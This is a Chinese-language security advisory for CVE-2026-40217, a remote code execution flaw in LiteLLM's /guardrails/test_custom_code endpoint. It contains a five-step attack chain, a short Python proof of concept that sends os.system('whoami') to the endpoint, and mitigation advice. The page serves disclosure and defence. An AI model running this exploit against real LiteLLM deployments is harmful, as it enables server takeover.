CVE-2026-40217 CVSS 8.8 高危

CVE-2026-40217 LiteLLM 远程代码执行漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40217

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LiteLLM

漏洞概述

LiteLLM 在 2026-04-08 及之前的版本中存在严重的安全漏洞。攻击者可利用 /guardrails/test_custom_code 接口，通过字节码重写技术执行任意代码。该漏洞无需用户交互且仅需低权限即可被利用，导致系统机密性、完整性和可用性均受严重影响。

技术细节

该漏洞的核心机制在于 LiteLLM 未能正确隔离 /guardrails/test_custom_code 接口的代码执行环境。攻击者利用 Python 的字节码操作特性，构造恶意的字节码序列。在提交测试代码时，通过字节码重写技术，攻击者能够绕过应用层面对危险函数（如 eval, exec, os.system）的静态过滤与黑名单检测。当服务端反序列化并执行这些字节码时，恶意逻辑被触发，从而在服务器上下文中执行任意系统命令。由于 CVSS 向量显示攻击路径为网络（AV:N）、权限要求低（PR:L）且无需用户交互（UI:N），这使得经过轻微认证的攻击者即可轻易发起攻击。一旦利用成功，攻击者将完全控制主机，严重影响数据的机密性、完整性和可用性。目前已有公开的 PoC 及 Metasploit 利用模块，建议立即排查。

攻击链分析

STEP 1

侦察与发现

攻击者扫描目标网络，识别出运行 LiteLLM 服务的实例，并确定其版本在受影响范围内（2026-04-08 之前）。

STEP 2

获取低权限凭证

由于漏洞权限要求为低（PR:L），攻击者通过注册或泄露的凭证获取一个普通用户账户的访问权限。

STEP 3

构造恶意载荷

攻击者编写包含恶意系统命令的 Python 代码，并利用字节码重写技术对其进行封装，以绕过基础的安全过滤机制。

STEP 4

发送利用请求

攻击者向 /guardrails/test_custom_code 端点发送 HTTP POST 请求，并在请求体中注入构造好的恶意字节码。

STEP 5

执行任意代码

服务端解析并执行恶意字节码，攻击者成功在服务器上执行任意系统命令，获得服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://localhost:4000/guardrails/test_custom_code"

# Malicious payload demonstrating code execution via bytecode rewriting concept
# In a real exploit, this would be a crafted bytecode payload
payload = """
import os
# Example command execution
os.system('whoami')
"""

data = {
    "code": payload,
    "function_name": "test_guardrail"
}

try:
    response = requests.post(target_url, json=data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

LiteLLM <= 2026-04-08

防御指南

临时缓解措施

如果无法立即升级，建议通过访问控制列表（ACL）或 WAF 规则完全阻断对 /guardrails/test_custom_code 路径的访问请求。同时，检查系统日志中是否存在对该接口的可疑调用，并加强对服务器进程活动的监控，以便及时发现潜在的入侵行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表